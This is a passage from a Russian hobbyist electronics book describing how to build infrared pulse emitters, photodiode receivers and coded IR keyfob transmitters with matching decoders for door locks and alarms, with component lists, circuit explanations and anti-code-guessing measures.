Общая компоновка излучателя показана на рис. 34. Помещенный в гнездо сечением 45х18 мм и глубиной 57...60 мм, вырубленное в стене дома, в столбе веранды, в перилах крыльца, в засохшем дереве и т.п., излучатель маскируют наклейкой подходящего цвета и фактуры. Если она непрозрачна для ИК лучей, в ней делают небольшое, по диаметру ИК диода, отверстие. Батарею питания лучше поместить снизу. Это позволит избежать порчи излучателя в случае ее разгерметизации.

В таблице 6 приведены зависимости Iимп - амплитуды тока в ИК диоде и Iпотр - тока, потребляемого генератором от источника питания, от Uпит - напряжения источника питания. Частота F и длительность tимп остаются при этом практически неизменными.

Токовый КПД ИК излучателя ррррh=Iимп·tимп·F / Iпотр =0,82...0,87. С батареей «Корунд» он сможет проработать непрерывно 2...3 месяца. А с аккумулятором «Ника», 7Д-ОД25 и т.п., подзаряжаемым солнечной батареей (БС-0.5-9П, БСМ-У1.1, Электроника M1 и др.), в не слишком плохих погодных условиях — без ограничения времени.

 

Рис. 32. Экономичный генератор ИК импульсов

Изображение: 

Рис. 33. Печатная плата ИК генератора

Изображение: 

Рис. 34. Компоновка ИК генератора

Изображение: 

3. Приемники импульсного ИК излучения

Приемники импульсного ИК излучения

Из фоточувствительных приборов далеко не все обладают достаточным быстродействием, чтобы реагировать на каждую вспышку ИК диода. Обычно в фотоприемниках импульсного излучения используют фотодиоды (см. приложение 2)*.

Импульсные микротоки, возникающие в фотодиоде при его облучении, необходимо усилить и привести к нормам цифрового стандарта, т.е. преобразовать каждую И К вспышку в импульс напряжения, пригодный для непосредственного управления цифровой микросхемой того или иного типа.

Высокое входное сопротивление и усиление, значительная широкополосность усилителя, пригодного для решения такой задачи, делают его чувствительным к электрическим наводкам самого разного происхождения. В том числе и к работе электронной «начинки» прибора, в который он входит сам. Поэтому фотодиод и его усилитель обычно тщательно экранируют.

Чувствительность фотоприемника может быть заметно снижена паразитной подсветкой. Поэтому его фотодиод прикрывают, как правило, блендой - зачерненным внутри отрезком металлической или пластмассовой трубы, отгораживающим его от источников света, находящихся в стороне от оптической оси.

Прямую, соосную подсветку фотодиода уменьшают фильтрами, ослабляющими видимую часть спектра подсветки. Лучше, конечно, воспользоваться для этого специальным инфракрасным фильтром с полосой прозрачности, совпадающей со спектром излучения ИК диода. Но опыт показывает, что неплохим ИК фильтром может быть тонкий эбонит, гетинакс, окрашенный полистирол, темные пластиковые обои. Однако, почти полностью «отрезая» видимый свет, такие материалы вносят заметное ослабление и в ИК сигнал.

Хотя современный фотодиод имеет, как правило, встроенную оптику, концентрирующую фотопоток на его р-п переходе, из-за малых размеров ее эффективность относительно невелика. Чувствительность фотоголовки значительно увеличится, если ее фотодиод будет помещен в фокус линзы диаметром 20...40 мм и более, концентрирующей на нем значительно больший световой поток. В этом качестве можно использовать, например, конденсор фотоувеличителя. Или объектив от старого фотоаппарата с наводкой на резкость «по метрам», который позволит к тому же настроить оптический канал наилучшим образом.

*) Непригодны, например, фотосопротивления. Достаточно высоким быстродействием обладают вакуумные фотоэлементы и фотоумножители (ФЭУ). Но для их питания требуются источники высокого напряжения: для фотоэлементов 50...300 В, для ФЭУ - до 1 кВ и более (см. приложение 6). Значительные габариты и хрупкость также ограничивают сферу их применения.

 

4. ИК приемник на транзисторах

ИК приемник на транзисторах

Принципиальная схема приемника импульсных ИК сигналов показана на рис. 35. Его выход может быть подключен ко входу цифровой КМОП-микросхемы непосредственно. Если фотоголовка должна быть удалена от цифрового анализатора, а емкость соединяющего их кабеля превысит 100...200 пФ, фотоусилитель потребуется дополнить буферным усилителем. Таким, например, как на рис. 36, а (усилитель-инвертор) или на рис. 36, б. Емкостная нагрузка фотоголовки с таким усилителем на выходе может быть увеличена до 0,01 мкФ.

2-8.jpg

Рис. 35. ИК приемник на транзисторах

2-9.jpg

Рис. 36. Усилители мощности в КМОП-технике

Таблица 7

Uпит,B

Iпотр,мA

4,5

0,30

5,0

0,30

6,0

0,32

7,0

0,34

8,0

0,35

9,0

0,37


 

Фотодиод ФД263-01 можно заменить на ФД320. А при наличии хорошего оптического концентратора - почти на любой из указанных в приложении 2.

ИК приемник сохраняет работоспособность при изменении напряжения источника питания Uпит в широких пределах. Зависимость потребляемого им тока Iпотр от напряжения питания показана в таблице 7.

 

Рис. 35. ИК приемник на транзисторах

Изображение: 

Рис. 36. Усилители мощности в КМОП-технике

Изображение: 

5. ИК приемник на микросхеме

ИК приемник на микросхеме

Принципиальная схема приемника импульсных ИК сигналов на специально для этой цели разработанной микросхеме показана на рис. 37.

Выход этого фотоприемника также может быть соединен с входами цифровых КМОП-микросхем напрямую. Но хотя его выходное сопротивление меньше, чем у описанного выше транзисторного, при большой длине линии, связывающей фотоприемник с электронным анализатором сигналов, его также нужно дополнить буферным усилителем (см. рис. 36, а, б). Емкость линии связи в этом случае может доходить до 0,01 мкФ.

Фотодиод ФД320 можно заменить на ФД263-01, а если в фотоприемнике есть линза-концентратор - практически любым фотодиодом из приложения 2.

2-10.jpg

Рис. 37. ИК приемник на микросхеме

Таблица 8

Uпит,B

Iпотр, мА

4,5

0,84

5,0

1,00

6,0

1,30

7,0

1,55

8,0

1,90

9,0

2,90


 

Усиление фотоголовки можно уменьшить, зашунтировав вход усилителя резистором сопротивлением 0,3...3 МОм.

В таблице 8 приведена зависимость тока Iпотр , потребляемого фотоголовкой, от напряжения источника питания Uпит.

 

Рис. 37. ИК приемник на микросхеме

Изображение: 

6. Инфракрасная «визитная карточка»

Инфракрасная «визитная карточка»

ИК система автоматического опознания узнает «своего» по особому сигналу, который излучает брелок-генератор владельца.

Таким сигналом может быть «пакет», содержащий строго определенное число очень коротких инфракрасных импульсов- вспышек. Факторами, затрудняющими информационный «взлом» такой системы, являются, кроме того, длительность каждой вспышки и длительность всего «пакета». Они ограничиваются, как правило, довольно жесткими пределами.

Ниже описан брелок-генератор, формирующий такой пакет-код, и соответствующее ему приемное устройство.

 

7. ИК генератор «визитной карточки» с шифратором

ИК генератор «визитной карточки» с шифратором

На рис. 38 приведена принципиальная схема ИК генератора, формирующего пакет, содержащий N импульсов, где NО{1,...,1023} - может быть любым в этих пределах*.

Здесь DD1.1, DD1.2, R2, С1 - управляемый мультивибратор, частота возбуждения которого f@160 кГц (f=1/2 R2·C1); DD2 - 14-разрядный двоичный счетчик; R3C2 - дифференцирующая цепочка, формирующая из спада меандра ( 1 на выходе DD1.3) короткий - 5...10 мкс - импульс, открывающий нормально закрытый транзистор VT1; VD1-VD10, R6 - шифратор (диодно-резисторный «И»), числом и размещением диодов в котором задают N;SB1 - кнопка включения излучателя.

При включении питания на входе R счетчика DD2 формируется импульс «единичной» амплитуды, устанавливающий его в исходное состояние (в этом состоянии на всех его выходах устанавливается напряжение низкого уровня), а мультивибратор, сделав семь холостых «оборотов», выходит на нормальный режим работы. Частота следования меандров на выходе 7 DD2 (четвертый разряд счетчика) F=f/2^4=10 кГц. С соответствующими интервалами - Тп@100 мкс- будут следовать друг за другом и 5...10-микросекундные ИК вспышки излучателя BL1.

2-11.jpg

Рис. 38. ИК генератор «визитной карточки»

Генерация ИК вспышек продолжится до тех пор, пока на выходе шифратора - входе элемента DD1.6 - не появится напряжение высокого уровня, и, соответственно, на его выходе - напряжение низкого уровня, закрывающего мультивибратор. Число импульсов в пакете зависит от числа и «веса» диодов в шифраторе:

N=VD1+2VD2+4VD3+8VD4+16VD5+32VD6+64VD7+128VD8+256VD9 +512VD10, где: VDi=l, если диод VDi установлен в шифратор, и VDi=0, если его нет. Так как N =1023 и Тп=10^4 с, то длительность пакета не превысит, очевидно, 0,11 с.

Амплитуда импульса тока в самом излучателе - в ИК диоде BL1 - зависит от напряжения питания генератора Uп и сопротивления резистора R7: Iи=(Uп-2,5)/R7 (Iи - в амперах, Uпит - в вольтах, R7 - в омах). Здесь, очевидно, Iи@0,07 А.

Однако нет особой необходимости строго следовать указанным номиналам и типам элементов, составляющих генератор. В качестве VT1 может быть взят практически любой n-p-n транзистор с h21э>100 и Iк max>100 мА, а излучателем BL1 могут служить ИК диоды типа АЛ115А, АЛ118А, АЛ119Б, АЛ147А и др. (см. приложение 3). В качестве кнопки SB1 можно воспользоваться каким-либо микропереключателем из перечисленных в приложении 1.

2-12.jpg

Рис. 39. Печатная плата ИК генератора «визитной карточки»

Особое внимание необходимо уделить постоянно подключенному к источнику питания конденсатору С5, поскольку при неудачном выборе он может оказаться здесь основным энергопотребителем. Если ИК генератор имеет небольшие размеры и питается, соответственно, от источника небольшой емкости, то ток утечки в конденсаторе С5 Ic5<1мкА. При небольших N конденсатор С5 может иметь меньшую емкость (и меньший, соответственно, Ic5). В первом приближении можно принять C5(мкФ)»N.

Печатную плату генератора изготавливают из двухстороннего фольгированного стеклотекстолита толщиной ~1,5 мм (рис. 39). Фольгу со стороны деталей используют лишь в качестве нулевого провода, для пропуска проводников она имеет выборки-кружки диаметром 1.5...2 мм (на рисунке не показаны).

В качестве источника питания ИК генератора можно взять алкалиновую батарею типа 11А (Ж10,3х16 мм, Uп=6 В, Е=33 мА·ч). Заметим, что в подобного рода приборах не так-важна электрическая емкость источника питания, как его саморазряд, физическая сохранность. Лучшие из нынешних батарей - литиевые - сохраняют свою работоспособность до 10 лет.

*) Запись NО{A} означает, что элемент N принадлежит множеству {А}, т.е. может быть одним из перечисленных в нем элементов.

 

Рис. 38. ИК генератор «визитной карточки»

Изображение: 

Рис. 39. Печатная плата ИК генератора «визитной карточки»

Изображение: 

8. ИК приемник «визитной карточки» с дешифратором

ИК приемник «визитной карточки» с дешифратором

Принципиальная схема приемника «визитной карточки» приведена на рис. 40. Здесь DA1 - микросхема, преобразующая импульс тока, возникающий в фотодиоде VDI под воздействием ИК вспышки, в импульс напряжения, амплитуда которого достаточна для непосредственного управления КМОП-микросхемами (рис. 41, а). На элементах DD1.1 и DD1.2 собран одновибратор, преобразующий короткий импульс, соответствующий длительности ИК вспышки*, в импульс длительностью tф=50 мкс (tф@1/2 tп, где tп - период следования ИК вспышек в кодовой посылке (рис. 41, б)). На элементах DD1.3, DD2.3-DD2.5 собрано устройство, формирующее импульс на входе R счетчика DD3 (рис. 41, г), которым он переводится в нулевое состояние по фронту первой же ИК вспышки, и временной

2-13.jpg

Рис. 40. ИК приемник «визитной карточки»

2-14.jpg

Рис. 41. Эпюры сигналов в ИК приемнике

интервал Тпр (рис. 41, в), в пределах которого счетчик DD3 может беспрепятственно вести подсчет импульсов (по их спаду), поступающих на его вход С.

Дешифрация кодовой посылки, выяснение того, содержит ли она Nкод - кодовое число импульсов, возлагается на дешифратор Д1. В качестве примера, демонстрирующего его структуру, на рис. 42, а приведена конфигурация Д1 для Nкод=284. Поскольку «вес» выхода Qi в DD3 равен 2^(i-1), то в двоичной записи Nкод=000100011100 (2^(3-1)+ +2^(4-1)+2^(5-1)+2(9-1)=4+8+16+256=284). Дешифратор состоит из 4-входового конъюнктора** (Rl, VD3-VD5, VD9), входы которого

2-15.jpg

Рис. 42. Дешифратор для Nкод=284

подключены ко всем Qi=1, и 8-входового дизъюнктора (R2, VD1, VD2, VD6-VD8, VD10, VD12), входы которого подключены ко всем Qj=0. Легко видеть, что напряжение высокого уровня (лог.1) возникнет и сохранится на выходе DD1.4 (см. рис. 41, д) лишь в случае, если в счетчике DD3 будет зафиксирован Nкод, в любом другом оно так или иначе будет сведено к нулю. На рис. 42, б показана конфигурация конъюнктора в шифраторе ИК излучателя, формирующего Nкод =284; иное его положение на выходах счетчика связано с тем, что «вес» выхода Qi здесь равен 2^(i-5).

Подобную же структуру будет иметь дешифратор Д1 и для другого Nкод , с иными, конечно, позициями диодов в конъюнктере и дизъюнкторе.

Для того, чтобысистема реагировала на Nкод лишь при достаточно длительной его экспозиции, в цепь формирования выходного сигнала введена цепочка R9·C11@tэксп. Обычно принимают tэксп =0,3...3 с. На кратковременное появление Nкод (в попытках, например, побыстрее подобрать код) такая система просто не отреагирует.

Выход устройства - транзистор VT1 с открытым коллектором - может быть дополнен тем или иным исполнительным механизмом. Например, тональным генератором (рис. 43, а), предупреждающим

2-16.jpg

Рис. 43. Тональный генератор (а) и электронный ключ к электромеханическому замку (б)

о приходе «своего», или электронным ключом, управляющим электромагнитным замком Y1 (рис. 43, б).

В правильно собранном И К приемнике потребуется, возможно, уменьшить его чувствительность. Это можно сделать как электрически - зашунтировав, например, вход усилителя DA1 резистором R12 (показан на рис. 40 штриховой), так и оптически - прикрыв фотодиод «серым» фильтром, в качестве которого можно использовать, например, пластиковые обои, выполняющие заодно и функцию фильтра, почти полностью «отрезающего» видимую часть спектра паразитной подсветки.

Опыт показал, что излучение ИК генератора способно «пробить» даже 1,5...2-миллйметровый пластик. Кроме того, защитная накладка больших размеров, не позволяющая визуально определить положение фотодиода, окажется еще одним препятствием на пути несанкционированного проникновения в систему.

Защита от подбора кода - основная забота конструкторов такого рода устройств. Принятая здесь система кодирования относительно проста: Nкод - лишь одно число из тысячи возможных. Но подбор кода осложнен здесь и рядом других обстоятельств. Заметим, что длительность кодовой посылки Ткод не может быть ни слишком малой (иначе «слипнутся» импульсы на входе С счетчика DD3), ни слишком большой, больше Тпр (следующая затем ИК вспышка трансформируется в R-импульс, возвращающий DD3 в исходное состояние). Осложняет подбор кода и t^, во всяком случае очень его замедляет. Защитные функции заложены даже в яркость ИК вспышки - она должна быть лишь достаточной. Повышенная освещенность фотодиода может вывести фотоголовку приемника из рабочего режима и. привести к ошибкам в счете;

И все это, заметим, при отсутствии каких-либо специальных контрмер, которые здесь, конечно же, нетрудно предусмотреть. Можно ввести еще один (или не один) находящийся в стороне фотодатчик, засветка которого немедленно заблокирует систему. Или блокировку, реагирующую на слишком большое число сделанных попыток. Более четырех за минуту, например. Блокировки могут, конечно, и дополнять друг друга.

На рис. 44 показана печатная плата ИК приемника. Ее изготавливают из двустороннего фольгированного стеклотекстолита толщиной 1.5...2 мм. Фольгу со стороны деталей используют лишь в качестве нулевой шины-«земли» (к ней присоединен «-» источника питания), в местах пропуска проводников она имеет вытравленные

2-17.jpg

Рис. 44. Печатная плата ИК приемника «визитной карточки»

кружки диаметром 1.5...2 мм (на рисунке не показаны). Соединения с нуль-фольгой «заземляемых» выводов показаны зачерненными квадратами.

фотоусилитель (VD1, DA1 и др.) с его большой чувствительностью, широкополосностью, высоким входным сопротивлением необходимо экранировать. В противном случае электрические наводки, в том числе и от работы собственного дешифратора, могут сделать ИК приемник совершенно неработоспособным. Экран, имеющий «окно» для фотодиода, изготавливают из жести в виде коробки и припаивают к нуль-фольге в двух-трех точках. На рис. 44 штриховой линией показано примерное его расположение.

Таблица 9

Uпит, В

Iпотр, мА

4,2

0,9

5,0

1,1

6,0

1,3

7,0

1,6

8.0

1,9

9,0

2,3


 

Рекомендуется также принять меры к минимизации подсветки фотодиода посторонними источниками света, поскольку это может заметно снизить чувствительность приемника к сигналам своего ИК генератора. В качестве бленды, ограничивающей боковой подсвет фотодиода, можно взять отрезок зачерненной внутри пластмассовой или металлической тубы диаметром 10... 15 мм.

Фоточувствительную часть приемника можно изготовить в виде отдельной головки, соединенной с другими его элементами тонким трехпроводным кабелем («+», «-», выв. 10 DA1). Малые размеры такой фотоголовки позволят установить ее в вырезе дверного «глазка», за маскирующей накладкой в толще двери, в дверной коробке и т.п.

ИК приемник сохраняет работоспособность в широком диапазоне питающих напряжений. Зависимость потребляемого им тока Iпотр от напряжения питания Uпит показана в таблице 9.

*) Напомним, что длительность импульса на выходе фотоусилителя DA1 зависит не только от длительности ИК вспышки, но и ее яркости - освещенности фотодиода. Причина - в относительно медленном восстановлении его темновой проводимости.

**) Физические элементы, реализующие конъюнкцию и дизъюнкцию, - так в работах по математической логике обычно называют логические функции И и ИЛИ. Если мы и далее намерены пользоваться результатами математических исследований и не намерены повторять их (что было бы, кстати, совсем непросто), то должны, как минимум, понимать их язык.

 

 

Рис. 40. ИК приемник «визитной карточки»

Изображение: 

Рис. 41. Эпюры сигналов в ИК приемнике

Изображение: 

Рис. 42. Дешифратор для Nкод=284

Изображение: 

Рис. 43. Тональный генератор (а) и электронный ключ к электромеханическому замку (б)

Изображение: 

Рис. 44. Печатная плата ИК приемника «визитной карточки»

Изображение: 

9. Инфракрасный «электронный пароль»

Инфракрасный «электронный пароль»

Независимо от характера излучения, будь то радиоволна, ультразвук или свет, особое внимание в устройствах автоматического опознания «своего» уделяют самому сигналу. Основное к нему требование: вероятность появления точно такого же сигнала из постороннего источника должна быть пренебрежимо малой.

В современной технике кодовая посылка обычно имеет вид двоичной последовательности, например, 1001101000111..., где единице соответствует наличие излучения, а нулю - пауза «чистого» эфира или какое-то другое излучение. Если n - число разрядов (знако мест) в таком сигнале, то по-разному расставляя единицы и нули, мы сможем получить 2" различных их сочетаний. Так при n=7 их 128, при n=15-32768, а при n=23 - 8388608.

Среди множества возможных какую-то одну двоичную последовательность выделяют особо - в качестве кода, электронного пароля.

 

10. ИК генератор «электронного пароля» с шифратором

ИК генератор «электронного пароля» с шифратором

На рис. 45 приведена принципиальная схема генератора, формирующего подобным образом последовательность инфракрасных вспышек.

Здесь DD1.1, DD1.2, Rl, ZQ1 - задающий генератор, работающий на частоте часового кварцевого резонатора ZQ1 - 32768 Гц. Микросхемы DD4 и DD5 составляют электронный коммутатор, его выход (объединенные выводы 3 DD4 и DD5) оказывается соединенным с одним из Х-входов этих микросхем в зависимости от адреса, поступающего на входы 1, 2,4, и сигнала на входе S (активизируется микросхема с S=0). Адрес и сигнал S формирует счетчик DD3. Легко вычислить, что смена адреса будет происходить здесь каждые 0,976 мс ((2^5)/32768 с), это tзн - длительность знакоместа в кодовой посылке В середине каждого знакоместа может быть сформирован короткий (R4C2@10 мкс) импульс на выходе DD1.4. Но это произойдет лишь в том случае, если данному знакоместу будет соответствовать сигнал 1 на выходе коммутатора. Этот импульс откроет нормально запертый транзисторный усилитель (VT1, VT2 и др.) и ток, возникший в ИК диоде BI1, преобразуется в ИК вспышку той же длительности.

2-18.jpg

Рис. 45. ИК генератор «электронного пароля»

Генерация кодовой последовательности начинается (SA1 включен, кнопка SB1 нажата) с формирования короткого импульса на входе R счетчика DD3 (tr@R3·C1), устанавливающего его в исходное, нулевое состояние, и заканчивается с появлением сигнала 1 на выходе 29(вьIB. 14) DD3. Знакоместа - их, очевидно, 16 - следуют во времени в соответствии нумерацией (по стрелкам) Х-входов электронных коммутаторов: 1, 2,..., 14, 15 (нулевому знакоместу всегда соответствует 1; это стартовый импульс пакета, не входящий, конечно, в число кодообразующих). Общая продолжительность кодовой посылки составит таким образом 0,976x15@14,6 мс.

Нужное число-код формируют, так или иначе коммутируя Х-входы микросхем DD4, DD5: соединяя i-ую стрелку с «+» источника питания, если в i-том разряде кода должна быть 1 (X1 DD4, формирующий стартовый импульс пакета , уже соединен с +Uп, или с «землей», если должен быть 0. Так, например, для генерации кода 111011100111001 потребуется соединить стрелки 1, 2, 3, 5, 6, 7, 10, 11, 12, 15 с «+», а стрелки 4, 8, 9,13, 14 - с «-» источника питания.

2-19.jpg

Рис. 46. Печатная плата ИК генератора «электронного пароля»

Поскольку n=15, то число различных сигналов, из которых любой может быть закоммутирован в качестве кодового, составляет здесь 2^15=32768.

Генератор монтируют на печатной плате, изготовленной из двустороннего фольгированного стеклотекстолита толщиной 1,2...1,5 мм (рис. 46). Фольгу со стороны деталей используют лишь в качестве общего провода (с ней соединен «-» источника питания): в местах пропуска проводников она должна иметь выборки - кружки диаметром 1,5...2 мм (на рисунке не показаны). Места соединения с нуль-фольгой «заземляемых» выводов резисторов, конденсаторов и др. показаны черными квадратами; черными квадратами со светлой точкой в центре - «заземляемые» выводы микросхем и положение проволочной перемычки, соединяющей с нуль-фольгой «минусовой» вывод конденсатора С4.

В качестве источника питания генератора можно взять 6-вольтную батарею 11 А (габариты - Ж10,3х16 мм, электрическая емкость - 33 мА·ч).

Выключатель SA1 типа ПД9-1 монтируют непосредственно на корпусе генератора. Кнопка SB1, типа ПКн-159 или подобная ей,
должна иметь провод длиной 6...8 мм, достаточный для его вывода сквозь стенку корпуса.

2-20.jpg

Рис. 47. Осциллограмма кода «111011100111001»

Правильно собранный генератор наладки не требует. Проконтролировать его работу можно с помощью осциллографа, подключив его вход к коллектору транзистора VT1. После включения SA1 и нажатия кнопки SB1 на экране осциллографа (время ждущей развертки 20...30 мс) должна возникнуть и исчезнуть последовательность импульсов, расставленных во времени в соответствии с закоммутированным сигналом. Если это рассмотренный выше код 111011100111001, то ему будет соответствовать осциллограмма, изображенная на рис. 47 («лишний» импульс ,в начале пакета - стартовый). По амплитуде импульсов, измеренных на резисторе R9, можно судить о токе в ИК диоде Iимп@Uимп /R9 (Iимп - в амперах, Uимп - в вольтах, R9 - в омах), а в быстрой развертке (20...50 мкс, тоже ждущей) - об их форме и длительности, которая должна быть в пределах 5...15 мкс.

Двухступенчатое включение кодового излучателя - сначала выключателем SA1, а затем кнопкой SB1 - связано с особенностью самовозбуждения кварцованных генераторов, с их довольно медленным (из-за высокой добротности кварцевого резонатора) вхождением в рабочий режим.

2-21.jpg

Рис. 48. Вариант включения генератора

Выключатель SA1 можно исключить, организовав питание генератора так, как показано на рис. 48. Но в таком случае кнопку SB1 потребуется нажимать дважды: первое нажатие даст, скорее всего, неверную комбинацию (которая, кстати, может быть даже полезна как маскирующая истинный код). Без выключателя SA1 можно обойтись и в том случае, если в качестве источника питания генератора будет взята низковольтная батарея достаточной емкости, способная обеспечить продолжительную его работу при постоянно включенных микросхемах. Например, литиевый элемент с ЭДС=3 В, имеющий электрическую емкость 0,1 А·ч, сможет проработать в таком режиме около года.

Таблица 10

Uпит, В

Iпотр, мкА

Iимп, А

2,4

5

0,18

3,7

16

0,38

4,3

30

0,38

5,0

60

0,46

6.0

140

0,59

7,0

360

0,72


 

В кодовом излучателе могут быть использованы практически любые ИК диоды, ограничения - лишь габаритные: высота деталей на печатной плате не должна превышать 8 мм. Все резисторы здесь типа МЛТ-0,125, неэлектролитические конденсаторы - КМ-5, КМ-6, К10-17Б и др. Конденсатор С4 - типа К50-35 или К50-40. Рабочее напряжение конденсатора С6 (CE-DS Магсоп, его монтируют в положении «лежа») должно соответствовать напряжению источника питания. В варианте, показанном на рис. 48, необходимо предварительно проконтролировать состояние его диэлектрика: ток утечки в С6 должен быть меньше 1 мкА. При увеличении сопротивления резистора R9, ограничивающего ток в ИК диоде, емкость конденсатора С6 может быть соответственно уменьшена. Довольно большая «дальнобойность» ИК излучателя (с R9=3,9 Ом превышающая 10 м) может оказаться просто ненужной.

Кодовый генератор сохраняет свою работоспособность в широком диапазоне питающих напряжений. В таблице 10 показана зависимость потребляемого им тока Iпотр и тока в ИК диоде Iимп от напряжения источника питания Uпит.

 

Рис. 45. ИК генератор «электронного пароля»

Изображение: 

Рис. 46. Печатная плата ИК генератора «электронного пароля»

Изображение: 

Рис. 47. Осциллограмма кода «111011100111001»

Изображение: 

Рис. 48. Вариант включения генератора

Изображение: 

11. ИК приемник «электронного пароля» с дешифратором

ИК приемник «электронного пароля» с дешифратором

Принципиальная схема устройства, принимающего кодированный ИК сигнал брелка-генератора, показана на рис. 49.

Микросхема DA1, представляющая собой фотоусилитель, преобразует импульсы тока в фотодиоде BL1, возбуждаемые ИК вспышками брелка-излучателя, в импульсы напряжения, пригодные для прямого их введения в цифровой анализатор. На рис. 50, а показана импульсная последовательность на выходе фотоусилителя, соответствующая коду 111011100111001, который мы здесь и ниже будем рассматривать в качестве примера.

В приемнике два формирователя. Один из них, выполненный на элементах DD1.1 и DD3.1, расширяет каждый из поступающих импульсов (напомним: их длительность - около 10 мкс) до tф1@R3·C5@0,6...0,8 мс (должно быть выполнено условие: 0,5·tзн<tф1<tзн где tзн=0,976 мс - длительность знакоместа в кодированном сигнале; см. рис. 50, а, б). А второй, собранный на элементах DD1.2 и DD3.3, формирует импульс длительностью tф2@R4·C6=30...50 мс (должно быть: tф2 >16 tзн; см. рис. 50, г). По фронту этого импульса на выходе элемента DD3.5 формируется короткий импульс (tr @R5·C7@10 мкс), устанавливающий сдвигающий регистр DD4-DD5 и счетчик DD6 в нулевое состояние (рис. 50, д).

Элементы DD1.3, DD1.4, R7, ZQ1 образуют задающий генератор, работающий на частоте кварцевого резонатора ZQ1 - 32768 Гц (задающий генератор ИК излучателя, напомним, работает на этой же частоте).

Принимаемый сигнал (или помеха) фиксируется в сдвигающем регистре DD4-DD5 следующим образом. Фронтом первой же ИК вспышки все запоминающие элементы устройства переключаются

2-22.jpg

Рис. 49. ИК приемник «электронного пароля»

2-23.jpg

Рис. 50. Эпюры сигналов для кода «111011100111001»

в нулевое состояние (на выходах микросхем DD4-DD6 устанавливаются нули) и счетчик DD6 начинает счет. Примерно через 0,5 мс (tзн/2) нуль на выходе 2^4 (выв. 5) счетчика DD6 будет замещен единицей. В сдвигающем регистре К561ИР2 изменение напряжения на входе С вида J приводит к перемещению хранящегося в нем числа на один разряд в сторону старших (на рис. 49 - вниз), а в младший разряд регистра DD4 будет вписано то значение, которое в этот момент окажется на его входе D (выв. 7). Это может быть и 1 - расширенный до tф1 «единичный» импульс, и 0 - если ИК вспышка в этом знакоместе кодовой посылки отсутствовала. Следующий сдвиг числа произойдет через tзн=0,976 мс - «шаг», который сохранится в дальнейшем.

Система сделает лишь 16 поразрядных сдвигов (сдвигающие импульсы, генерируемые счетчиком DD6, показаны на рис. 50, в) - с появлением единицы на выходе 29 счетчика DD6 и, соответственно, нуля на входе DD2.2 (выв. 9), счетчик самозаблокируется и останется в этом состоянии до очередного старта системы.

Таким образом принятая последовательность И К вспышек преобразуется в число, хранящееся в регистре DD4-DD5. Остается выяснить - является ли оно кодовым.

Осуществляется это диодно-резисторным дешифратором Д1, схему которого (для того же кода 111011100111001) иллюстрирует рис. 51. Идея дешифрации проста. Все выходы регистра, на которых в соответствии с кодовой комбинацией должна быть единица, подключают к входам диодно-резисторного конъюнктора (VD1,VD4- VD6, VD9-VD11, VD13-VD15, R1), а выходы, на которых должен

2-24.jpg

Рис. 51. Дешифратор для кода «111011100111001»

быть нуль, — к входам диоднорезисторного дизъюнктора (VD2, VD3, VD7, VD8, VD12, R2). Если в регистре зафиксировано число- код, то на выходе конъюнктора установится напряжение высокого уровня - 1, а Выходе диэъюнктора - низкого - 0. И только в этом случае на выходе ИК приемника возникнет сигнал 1. Это «единичное» его состояние продержится до тех пор, пока не будет нажата кнопка SB1 «Сброс» (параллельно ей может быть включено несколько кнопок такого же назначения) или по каналу не пройдет какой-либо посторонний сигнал*.

Приемник смонтирован на плате размером 83х54 мм, выполненной из двустороннего фольгированного стеклотекстолита толщиной 1,5 мм (рис. 52). Технология изготовления платы и приемы монтажа деталей на ней те же, что и при изготовлении платы брелка-генератора.

Особое внимание при монтаже приемника следует обратить на электрическую экранировку фотоголовки (BL1, DA1 и др.): обладая высокой чувствительностью и значительной широкополосностью, она подвержена воздействию электрических сигналов самого разного происхождения. Экран можно изготовить из жести, его раскрой показан на рис. 53: по штриховым линиям сгибают коробку, пропаивают ее в углах, выравнивают низ и установив так, как показано штрих-пунктиром на рис. 52, припаивают в двух-трех точках к нуль-фольге. При необходимости усиление фотоголовки можно уменьшить, зашунтировав вход микросхемы DA1 резистором сопротивлением R1=0,3...З МОм.

 

2-25.jpg

Рис. 52. Печатная плата ИК приемника «электронного пароля»


Все резисторы в приемнике - типа МЛТ-0,125. Габариты конденсаторов С4 и С10 - Ж8х12 мм. Конденсатор С2 - типа К53-30, остальные - КМ-6, К10-176 и КД. Габариты кварцевого резонатора - Ж2х6 мм.

На плате выделено место для размещения элементов описанного выше (см. рис. 43, а) звукового генератора. На рис. 52 оно оконтурено штрих-пунктиром.

Необходимо принять меры по ослаблению засветки фотодиода посторонними источниками света, способными существенно

2-26.jpg

Рис. 53. Выкройка экрана фотоусилителя

уменьшить чувствительность фотоприемника. Фотодиод можно поместить в «колодец», склеенный из черного полистирола, который защитит его от воздействия источников, расположенных в стороне от оптической оси. К тому же образующийся невидимый «коридор», в пределах которого только и будет возможен оптический контакт приемника с брелком-излучателем, умножит и без того немалые трудности информационного «взлома» системы.

Окно фотодиода полезно заклеить пленкой, ослабляющей по преимуществу видимый свет. Тем более, что расстояние, на котором приемник способен обнаружить и дешифровать ИК вспышки брелка, в не слишком плохих условиях превышает 10 м. В чем, чаще всего, нет никакой необходимости.

К выходу приемника (выв. 12 элемента DD3.6) могут быть подключены самые разные сигнальные устройства. Например, светодиод, показанный на рис. 49 штриховым контуром, или звуковой генератор, оповещающие о появлении «своего». Но если по сигналу приемника охранная система должна принять решение самостоятельно (включить, например, привод электрозамка), то в электронный ключ, управляющий исполнительным механизмом (ИМ), нужно ввести задержку. Так, например, как это показано на рис. 54. Запаздывание включения ИМ зависит здесь от постоянной времени R2C1 и может составить несколько десятых долей секунды. Длительность задержки увеличится еще, если в эмиттерную цепь транзистора VT1 включить диод VD3, рассчитанный на рабочий ток ИМ, например, КД213А. Напряжение питания ИМ, с учетом возникающих при его выключении экстранапряжений (диод VD2 при индуктивных нагрузках обязателен), не должно превышать максимально допустимого для транзистора VT1 (60 В - для КТ972А, 45 В - для КТ972Б). Рабочий ток исполнительного механизма не должен превышать здесь 2 А.

2-27.jpg

Рис. 54. Электронный ключ с задержкой

Задержка срабатывания исполнительного механизма - эффективное средство в борьбе с попытками выяснить подбором задействованный в системе код. В принятой здесь системе кодирования даже секундная задержка заставит злоумышленника простоять у чужих дверей не один час. И это - при наличии у него соответствующей аппаратуры, знания принципов кодирования и время-импульсных характеристик ИК излучения. «Подсмотреть» же работу ИК брелкагенератора, не войдя в визуальный контакт с его владельцем, несравненно сложнее, нежели это допускают кодовые генераторы, работающие в радиодиапазоне.

Приемник сохраняет работоспособность при снижении напряжения питания до 4 В, потребляемый им ток не превышает 1,4 мА.

